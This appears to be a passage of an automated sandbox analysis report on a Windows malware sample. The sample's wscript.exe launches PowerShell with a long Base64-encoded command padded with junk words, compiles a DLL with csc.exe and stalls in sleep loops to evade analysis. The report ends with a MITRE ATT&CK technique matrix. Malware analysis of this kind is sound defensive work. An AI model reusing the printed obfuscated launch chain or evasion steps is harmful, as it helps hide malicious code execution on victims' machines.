    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1160
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5984Thread sleep time: -11068046444225724s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5984Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: powershell.exe, 0000000E.00000002.886458103.0000000004701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 0000000E.00000002.886458103.0000000004701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Instru9 SBEURTERNE Slan Spontan7 UNCALL embo reit Tarpape ugiftesd BACKSTAIR egoityh Smed UROGEN vasorrhap Ametro PARAPHRAST Krymmelloc2 INTERSPIR Unsque6 jacobitis PHONOPH Absconders7 Chikitaops SKYGG DOMMEDAGS nonassista Archche tviv Kaprifoli Finansti #Trippets Mlke2 nonexplor FOLKECE Arveflge FASTPRISSY Hoggw6 Repet4 HALVONKLE Arbejds PLOTTER Tsed #Dynamikken7 STKYSTT Hydronit5 redistri mericar vipp Fabr1 FLOVMA AANDSHO Staalstu JESUI Tana Commo Guapino Synkron7 devlinret Omstningsg Rese2 metrolo SUGENEKDBO Svirpetsum1 hydrater OBSERVA TEMPANA VIKINGER upriveeks heartb Embed UNASSEN OPKLA eebreere Picritic3 #EELIEST Crystalog1 DUSINME Indiv8 udskriftsp Teknokra1 tyndtf Elevtime6 dyksv bonboners anticapit under vier YDERP Klbebaand9 Vipst4 Maximon Appraise4 ARTIGER #UDSKRIDN zitas spank Tipperho6 scrol Fnisr FRASIGE dieticia haan Spaamnds1 servi Ledsagemu Underkendt7 Sandp4 kapslerbas disr PROP rosse Forkla9 #Transistor1 WARD Domsfo3 BAJADSEN KARAKTERB chlo Isoc Orontium3 Equippe7 Epigramr Mattispu Shoppinge RETI DEORSUMV almu Gravhu Forsg8 THIR LITOGRAFRA Stra distri SPLICEAB gritmedi lseadga KATAPU mani Parenthoo udsvi #Samlivs5 ambi urootwos Resistingl7 transporta spejling NATIONAL Endeven6 ROLLE Unintell6 mode Sectionall7 Unser9 Ferryslo #TANDBR frio Tillid7 Progyp9 HAVEBR maugerass bemalingco Heteromorp2 Snapre ABNE Lysdd Under #MULLEINS Magdal4 NONCRYST Hoejr5 BUNINGE SWIDG forpagt TYPEGOD SMAAPARTI UNDERSKOVD Skoleg arusha coat Bekymre5 snigg
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Instru9 SBEURTERNE Slan Spontan7 UNCALL embo reit Tarpape ugiftesd BACKSTAIR egoityh Smed UROGEN vasorrhap Ametro PARAPHRAST Krymmelloc2 INTERSPIR Unsque6 jacobitis PHONOPH Absconders7 Chikitaops SKYGG DOMMEDAGS nonassista Archche tviv Kaprifoli Finansti #Trippets Mlke2 nonexplor FOLKECE Arveflge FASTPRISSY Hoggw6 Repet4 HALVONKLE Arbejds PLOTTER Tsed #Dynamikken7 STKYSTT Hydronit5 redistri mericar vipp Fabr1 FLOVMA AANDSHO Staalstu JESUI Tana Commo Guapino Synkron7 devlinret Omstningsg Rese2 metrolo SUGENEKDBO Svirpetsum1 hydrater OBSERVA TEMPANA VIKINGER upriveeks heartb Embed UNASSEN OPKLA eebreere Picritic3 #EELIEST Crystalog1 DUSINME Indiv8 udskriftsp Teknokra1 tyndtf Elevtime6 dyksv bonboners anticapit under vier YDERP Klbebaand9 Vipst4 Maximon Appraise4 ARTIGER #UDSKRIDN zitas spank Tipperho6 scrol Fnisr FRASIGE dieticia haan Spaamnds1 servi Ledsagemu Underkendt7 Sandp4 kapslerbas disr PROP rosse Forkla9 #Transistor1 WARD Domsfo3 BAJADSEN KARAKTERB chlo Isoc Orontium3 Equippe7 Epigramr Mattispu Shoppinge RETI DEORSUMV almu Gravhu Forsg8 THIR LITOGRAFRA Stra distri SPLICEAB gritmedi lseadga KATAPU mani Parenthoo udsvi #Samlivs5 ambi urootwos Resistingl7 transporta spejling NATIONAL Endeven6 ROLLE Unintell6 mode Sectionall7 Unser9 Ferryslo #TANDBR frio Tillid7 Progyp9 HAVEBR maugerass bemalingco Heteromorp2 Snapre ABNE Lysdd Under #MULLEINS Magdal4 NONCRYST Hoejr5 BUNINGE SWIDG forpagt TYPEGOD SMAAPARTI UNDERSKOVD Skoleg arusha coat Bekymre5 snigg
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBJAG4AcwB0AHIAdQA5ACAAUwBCAEUAVQBSAFQARQBSAE4ARQAgAFMAbABhAG4AIABTAHAAbwBuAHQAYQBuADcAIABVAE4AQwBBAEwATAAgAGUAbQBiAG8AIAByAGUAaQB0ACAAVABhAHIAcABhAHAAZQAgAHUAZwBpAGYAdABlAHMAZAAgAEIAQQBDAEsAUwBUAEEASQBSACAAZQBnAG8AaQB0AHkAaAAgAFMAbQBlAGQAIABVAFIATwBHAEUATgAgAHYAYQBzAG8AcgByAGgAYQBwACAAQQBtAGUAdAByAG8AIABQAEEAUgBBAFAASABSAEEAUwBUACAASwByAHkAbQBtAGUAbABsAG8AYwAyACAASQBOAFQARQBSAFMAUABJAFIAIABVAG4AcwBxAHUAZQA2ACAAagBhAGMAbwBiAGkAdABpAHMAIABQAEgATwBOAE8AUABIACAAQQBiAHMAYwBvAG4AZABlAHIAcwA3ACAAQwBoAGkAawBpAHQAYQBvAHAAcwAgAFMASwBZAEcARwAgAEQATwBNAE0ARQBEAEEARwBTACAAbgBvAG4AYQBzAHMAaQBzAHQAYQAgAEEAcgBjAGgAYwBoAGUAIAB0AHYAaQB2ACAASwBhAHAAcgBpAGYAbwBsAGkAIABGAGkAbgBhAG4AcwB0AGkAIAANAAoAIwBUAHIAaQBwAHAAZQB0AHMAIABNAGwAawBlADIAIABuAG8AbgBlAHgAcABsAG8AcgAgAEYATwBMAEsARQBDAEUAIABBAHIAdgBlAGYAbABnAGUAIABGAEEAUwBUAFAAUgBJAFMAUwBZACAASABvAGcAZwB3ADYAIABSAGUAcABlAHQANAAgAEgAQQBMAFYATwBOAEsATABFACAAQQByAGIAZQBqAGQAcwAgAFAATABPAFQAVABFAFIAIABUAHMAZQBkACAADQAKACMARAB5AG4AYQBtAGkAawBrAGUAbgA3ACAAUwBUAEsAWQBTAFQAVAAgAEgAeQBkAHIAbwBuAGkAdAA1ACAAcgBlAGQAaQBzAHQAcgBpACAAbQBlAHIAaQBjAGEAcgAgAHYAaQBwAHAAIABGAGEAYgByADEAIABGAEwATwBWAE0AQQAgAEEAQQBOAEQAUwBIAE8AIABTAHQAYQBhAGwAcwB0AHUAIABKAEUAUwBVAEkAIABUAGEAbgBhACAAQwBvAG0AbQBvACAARwB1AGEAcABpAG4AbwAgAFMAeQBuAGsAcgBvAG4ANwAgAGQAZQB2AGwAaQBuAHIAZQB0ACAATwBtAHMAdABuAGkAbgBnAHMAZwAgAFIAZQBzAGUAMgAgAG0AZQB0AHIAbwBsAG8AIABTAFUARwBFAE4ARQBLAEQAQgBPACAAUwB2AGkAcgBwAGUAdABzAHUAbQAxACAAaAB5AGQAcgBhAHQAZQByACAATwBCAFMARQBSAFYAQQAgAFQARQBNAFAAQQBOAEEAIABWAEkASwBJAE4ARwBFAFIAIAB1AHAAcgBpAHYAZQBlAGsAcwAgAGgAZQBhAHIAdABiACAARQBtAGIAZQBkACAAVQBOAEEAUwBTAEUATgAgAE8AUABLAEwAQQAgAGUAZQBiAHIAZQBlAHIAZQAgAFAAaQBjAHIAaQB0AGkAYwAzACAADQAKACMARQBFAEwASQBFAFMAVAAgAEMAcgB5AHMAdABhAGwAbwBnADEAIABEAFUAUwBJAE4ATQBFACAASQBuAGQAaQB2ADgAIAB1AGQAcwBrAHIAaQBmAHQAcwBwACAAVABlAGsAbgBvAGsAcgBhADEAIAB0AHkAbgBkAHQAZgAgAEUAbABlAHYAdABpAG0AZQA2ACAAZAB5AGsAcwB2ACAAYgBvAG4AYgBvAG4AZQByAHMAIABhAG4AdABpAGMAYQBwAGkAdAAgAHUAbgBkAGUAcgAgAHYAaQBlAHIAIABZAEQARQBSAFAAIABLAGwAYgBlAGIAYQBhAG4AZAA5ACAAVgBpAHAAcwB0ADQAIABNAGEAeABpAG0AbwBuACAAQQBwAHAAcgBhAGkAcwBlADQAIABBAFIAVABJAEcARQBSACAADQAKACMAVQBEAFMASwBSAEkARABOACAAegBpAHQAYQBzACAAcwBwAGEAbgBrACAAVABpAHAAcABlAHIAaABvADYAIABzAGMAcgBvAGwAIABGAG4AaQBzAHIAIABGAFIAQQBTAEkARwBFACAAZABpAGUAdABpAGMAaQBhACAAaABhAGEAbgAgAFMAcABhAGEAbQBuAGQAcwAxACAAcwBlAHIAdgBpACAATABlAGQAcwBhAGcAZQBtAHUAIABVAG4AZABlAHIAawBlAG4AZAB0ADcAIABTAGEAbgBkAHAANAAgAGsAYQBwAHMAbABlAHIAYgBhAHMAIABkAGkAcwByACAAUABSAE8AUAAgAHIAbwBzAHMAZQAgAEYAbwByAGsAbABhADkAIAANAAoAIwBUAHIAYQBuAHMAaQBzAHQAbwByADEAIABXAEEAUgBEACAARABvAG0AcwBmAG8AMwAgAEIAQQBKAEEARABTAEUATgAgAEsAQQBSAEEASwBUAEUAUgBCACAAYwBoAGwAbwAgAEkAcwBvAGMAIABPAHIAbwBuAHQAaQB1AG0AMwAgAEUAcQB1AGkAcABwAGUANwAgAEUAcABpAGcAcgBhAG0AcgAgAE0AYQB0AHQAaQBzAHAAdQAgAFMAaABvAHAAcABpAG4AZwBlACAAUgBFAFQASQAgAEQARQBPAFIAUwBVAE0AVgAgAGEAbABtAHUAIABHAHIAYQB2AGgAdQAgAEYAbwByAHMAZwA4ACAAVABIAEkAUg
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBJAG4AcwB0AHIAdQA5ACAAUwBCAEUAVQBSAFQARQBSAE4ARQAgAFMAbABhAG4AIABTAHAAbwBuAHQAYQBuADcAIABVAE4AQwBBAEwATAAgAGUAbQBiAG8AIAByAGUAaQB0ACAAVABhAHIAcABhAHAAZQAgAHUAZwBpAGYAdABlAHMAZAAgAEIAQQBDAEsAUwBUAEEASQBSACAAZQBnAG8AaQB0AHkAaAAgAFMAbQBlAGQAIABVAFIATwBHAEUATgAgAHYAYQBzAG8AcgByAGgAYQBwACAAQQBtAGUAdAByAG8AIABQAEEAUgBBAFAASABSAEEAUwBUACAASwByAHkAbQBtAGUAbABsAG8AYwAyACAASQBOAFQARQBSAFMAUABJAFIAIABVAG4AcwBxAHUAZQA2ACAAagBhAGMAbwBiAGkAdABpAHMAIABQAEgATwBOAE8AUABIACAAQQBiAHMAYwBvAG4AZABlAHIAcwA3ACAAQwBoAGkAawBpAHQAYQBvAHAAcwAgAFMASwBZAEcARwAgAEQATwBNAE0ARQBEAEEARwBTACAAbgBvAG4AYQBzAHMAaQBzAHQAYQAgAEEAcgBjAGgAYwBoAGUAIAB0AHYAaQB2ACAASwBhAHAAcgBpAGYAbwBsAGkAIABGAGkAbgBhAG4AcwB0AGkAIAANAAoAIwBUAHIAaQBwAHAAZQB0AHMAIABNAGwAawBlADIAIABuAG8AbgBlAHgAcABsAG8AcgAgAEYATwBMAEsARQBDAEUAIABBAHIAdgBlAGYAbABnAGUAIABGAEEAUwBUAFAAUgBJAFMAUwBZACAASABvAGcAZwB3ADYAIABSAGUAcABlAHQANAAgAEgAQQBMAFYATwBOAEsATABFACAAQQByAGIAZQBqAGQAcwAgAFAATABPAFQAVABFAFIAIABUAHMAZQBkACAADQAKACMARAB5AG4AYQBtAGkAawBrAGUAbgA3ACAAUwBUAEsAWQBTAFQAVAAgAEgAeQBkAHIAbwBuAGkAdAA1ACAAcgBlAGQAaQBzAHQAcgBpACAAbQBlAHIAaQBjAGEAcgAgAHYAaQBwAHAAIABGAGEAYgByADEAIABGAEwATwBWAE0AQQAgAEEAQQBOAEQAUwBIAE8AIABTAHQAYQBhAGwAcwB0AHUAIABKAEUAUwBVAEkAIABUAGEAbgBhACAAQwBvAG0AbQBvACAARwB1AGEAcABpAG4AbwAgAFMAeQBuAGsAcgBvAG4ANwAgAGQAZQB2AGwAaQBuAHIAZQB0ACAATwBtAHMAdABuAGkAbgBnAHMAZwAgAFIAZQBzAGUAMgAgAG0AZQB0AHIAbwBsAG8AIABTAFUARwBFAE4ARQBLAEQAQgBPACAAUwB2AGkAcgBwAGUAdABzAHUAbQAxACAAaAB5AGQAcgBhAHQAZQByACAATwBCAFMARQBSAFYAQQAgAFQARQBNAFAAQQBOAEEAIABWAEkASwBJAE4ARwBFAFIAIAB1AHAAcgBpAHYAZQBlAGsAcwAgAGgAZQBhAHIAdABiACAARQBtAGIAZQBkACAAVQBOAEEAUwBTAEUATgAgAE8AUABLAEwAQQAgAGUAZQBiAHIAZQBlAHIAZQAgAFAAaQBjAHIAaQB0AGkAYwAzACAADQAKACMARQBFAEwASQBFAFMAVAAgAEMAcgB5AHMAdABhAGwAbwBnADEAIABEAFUAUwBJAE4ATQBFACAASQBuAGQAaQB2ADgAIAB1AGQAcwBrAHIAaQBmAHQAcwBwACAAVABlAGsAbgBvAGsAcgBhADEAIAB0AHkAbgBkAHQAZgAgAEUAbABlAHYAdABpAG0AZQA2ACAAZAB5AGsAcwB2ACAAYgBvAG4AYgBvAG4AZQByAHMAIABhAG4AdABpAGMAYQBwAGkAdAAgAHUAbgBkAGUAcgAgAHYAaQBlAHIAIABZAEQARQBSAFAAIABLAGwAYgBlAGIAYQBhAG4AZAA5ACAAVgBpAHAAcwB0ADQAIABNAGEAeABpAG0AbwBuACAAQQBwAHAAcgBhAGkAcwBlADQAIABBAFIAVABJAEcARQBSACAADQAKACMAVQBEAFMASwBSAEkARABOACAAegBpAHQAYQBzACAAcwBwAGEAbgBrACAAVABpAHAAcABlAHIAaABvADYAIABzAGMAcgBvAGwAIABGAG4AaQBzAHIAIABGAFIAQQBTAEkARwBFACAAZABpAGUAdABpAGMAaQBhACAAaABhAGEAbgAgAFMAcABhAGEAbQBuAGQAcwAxACAAcwBlAHIAdgBpACAATABlAGQAcwBhAGcAZQBtAHUAIABVAG4AZABlAHIAawBlAG4AZAB0ADcAIABTAGEAbgBkAHAANAAgAGsAYQBwAHMAbABlAHIAYgBhAHMAIABkAGkAcwByACAAUABSAE8AUAAgAHIAbwBzAHMAZQAgAEYAbwByAGsAbABhADkAIAANAAoAIwBUAHIAYQBuAHMAaQBzAHQAbwByADEAIABXAEEAUgBEACAARABvAG0AcwBmAG8AMwAgAEIAQQBKAEEARABTAEUATgAgAEsAQQBSAEEASwBUAEUAUgBCACAAYwBoAGwAbwAgAEkAcwBvAGMAIABPAHIAbwBuAHQAaQB1AG0AMwAgAEUAcQB1AGkAcABwAGUANwAgAEUAcABpAGcAcgBhAG0AcgAgAE0AYQB0AHQAaQBzAHAAdQAgAFMAaABvAHAAcABpAG4AZwBlACAAUgBFAFQASQAgAEQARQBPAFIAUwBVAE0AVgAgAGEAbABtAHUAIABHAHIAYQB2AGgAdQAgAEYAbwByAHMAZwA4ACAAVABIAEkAUg
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBJAG4AcwB0AHIAdQA5ACAAUwBCAEUAVQBSAFQARQBSAE4ARQAgAFMAbABhAG4AIABTAHAAbwBuAHQAYQBuADcAIABVAE4AQwBBAEwATAAgAGUAbQBiAG8AIAByAGUAaQB0ACAAVABhAHIAcABhAHAAZQAgAHUAZwBpAGYAdABlAHMAZAAgAEIAQQBDAEsAUwBUAEEASQBSACAAZQBnAG8AaQB0AHkAaAAgAFMAbQBlAGQAIABVAFIATwBHAEUATgAgAHYAYQBzAG8AcgByAGgAYQBwACAAQQBtAGUAdAByAG8AIABQAEEAUgBBAFAASABSAEEAUwBUACAASwByAHkAbQBtAGUAbABsAG8AYwAyACAASQBOAFQARQBSAFMAUABJAFIAIABVAG4AcwBxAHUAZQA2ACAAagBhAGMAbwBiAGkAdABpAHMAIABQAEgATwBOAE8AUABIACAAQQBiAHMAYwBvAG4AZABlAHIAcwA3ACAAQwBoAGkAawBpAHQAYQBvAHAAcwAgAFMASwBZAEcARwAgAEQATwBNAE0ARQBEAEEARwBTACAAbgBvAG4AYQBzAHMAaQBzAHQAYQAgAEEAcgBjAGgAYwBoAGUAIAB0AHYAaQB2ACAASwBhAHAAcgBpAGYAbwBsAGkAIABGAGkAbgBhAG4AcwB0AGkAIAANAAoAIwBUAHIAaQBwAHAAZQB0AHMAIABNAGwAawBlADIAIABuAG8AbgBlAHgAcABsAG8AcgAgAEYATwBMAEsARQBDAEUAIABBAHIAdgBlAGYAbABnAGUAIABGAEEAUwBUAFAAUgBJAFMAUwBZACAASABvAGcAZwB3ADYAIABSAGUAcABlAHQANAAgAEgAQQBMAFYATwBOAEsATABFACAAQQByAGIAZQBqAGQAcwAgAFAATABPAFQAVABFAFIAIABUAHMAZQBkACAADQAKACMARAB5AG4AYQBtAGkAawBrAGUAbgA3ACAAUwBUAEsAWQBTAFQAVAAgAEgAeQBkAHIAbwBuAGkAdAA1ACAAcgBlAGQAaQBzAHQAcgBpACAAbQBlAHIAaQBjAGEAcgAgAHYAaQBwAHAAIABGAGEAYgByADEAIABGAEwATwBWAE0AQQAgAEEAQQBOAEQAUwBIAE8AIABTAHQAYQBhAGwAcwB0AHUAIABKAEUAUwBVAEkAIABUAGEAbgBhACAAQwBvAG0AbQBvACAARwB1AGEAcABpAG4AbwAgAFMAeQBuAGsAcgBvAG4ANwAgAGQAZQB2AGwAaQBuAHIAZQB0ACAATwBtAHMAdABuAGkAbgBnAHMAZwAgAFIAZQBzAGUAMgAgAG0AZQB0AHIAbwBsAG8AIABTAFUARwBFAE4ARQBLAEQAQgBPACAAUwB2AGkAcgBwAGUAdABzAHUAbQAxACAAaAB5AGQAcgBhAHQAZQByACAATwBCAFMARQBSAFYAQQAgAFQARQBNAFAAQQBOAEEAIABWAEkASwBJAE4ARwBFAFIAIAB1AHAAcgBpAHYAZQBlAGsAcwAgAGgAZQBhAHIAdABiACAARQBtAGIAZQBkACAAVQBOAEEAUwBTAEUATgAgAE8AUABLAEwAQQAgAGUAZQBiAHIAZQBlAHIAZQAgAFAAaQBjAHIAaQB0AGkAYwAzACAADQAKACMARQBFAEwASQBFAFMAVAAgAEMAcgB5AHMAdABhAGwAbwBnADEAIABEAFUAUwBJAE4ATQBFACAASQBuAGQAaQB2ADgAIAB1AGQAcwBrAHIAaQBmAHQAcwBwACAAVABlAGsAbgBvAGsAcgBhADEAIAB0AHkAbgBkAHQAZgAgAEUAbABlAHYAdABpAG0AZQA2ACAAZAB5AGsAcwB2ACAAYgBvAG4AYgBvAG4AZQByAHMAIABhAG4AdABpAGMAYQBwAGkAdAAgAHUAbgBkAGUAcgAgAHYAaQBlAHIAIABZAEQARQBSAFAAIABLAGwAYgBlAGIAYQBhAG4AZAA5ACAAVgBpAHAAcwB0ADQAIABNAGEAeABpAG0AbwBuACAAQQBwAHAAcgBhAGkAcwBlADQAIABBAFIAVABJAEcARQBSACAADQAKACMAVQBEAFMASwBSAEkARABOACAAegBpAHQAYQBzACAAcwBwAGEAbgBrACAAVABpAHAAcABlAHIAaABvADYAIABzAGMAcgBvAGwAIABGAG4AaQBzAHIAIABGAFIAQQBTAEkARwBFACAAZABpAGUAdABpAGMAaQBhACAAaABhAGEAbgAgAFMAcABhAGEAbQBuAGQAcwAxACAAcwBlAHIAdgBpACAATABlAGQAcwBhAGcAZQBtAHUAIABVAG4AZABlAHIAawBlAG4AZAB0ADcAIABTAGEAbgBkAHAANAAgAGsAYQBwAHMAbABlAHIAYgBhAHMAIABkAGkAcwByACAAUABSAE8AUAAgAHIAbwBzAHMAZQAgAEYAbwByAGsAbABhADkAIAANAAoAIwBUAHIAYQBuAHMAaQBzAHQAbwByADEAIABXAEEAUgBEACAARABvAG0AcwBmAG8AMwAgAEIAQQBKAEEARABTAEUATgAgAEsAQQBSAEEASwBUAEUAUgBCACAAYwBoAGwAbwAgAEkAcwBvAGMAIABPAHIAbwBuAHQAaQB1AG0AMwAgAEUAcQB1AGkAcABwAGUANwAgAEUAcABpAGcAcgBhAG0AcgAgAE0AYQB0AHQAaQBzAHAAdQAgAFMAaABvAHAAcABpAG4AZwBlACAAUgBFAFQASQAgAEQARQBPAFIAUwBVAE0AVgAgAGEAbABtAHUAIABHAHIAYQB2AGgAdQAgAEYAbwByAHMAZwA4ACAAVABIAEkAUg
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBAD5.tmp" "c:\Users\user\AppData\Local\Temp\wwh3pdnv\CSC196797DCDE8F47A0A151AAD0920D1B.TMP"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter
    Path Interception11
    Process Injection
    11
    Masquerading
    OS Credential Dumping1
    Query Registry
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts221
    Scripting
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Security Software Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell
    Logon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information
    NTDS21
    Virtualization/Sandbox Evasion
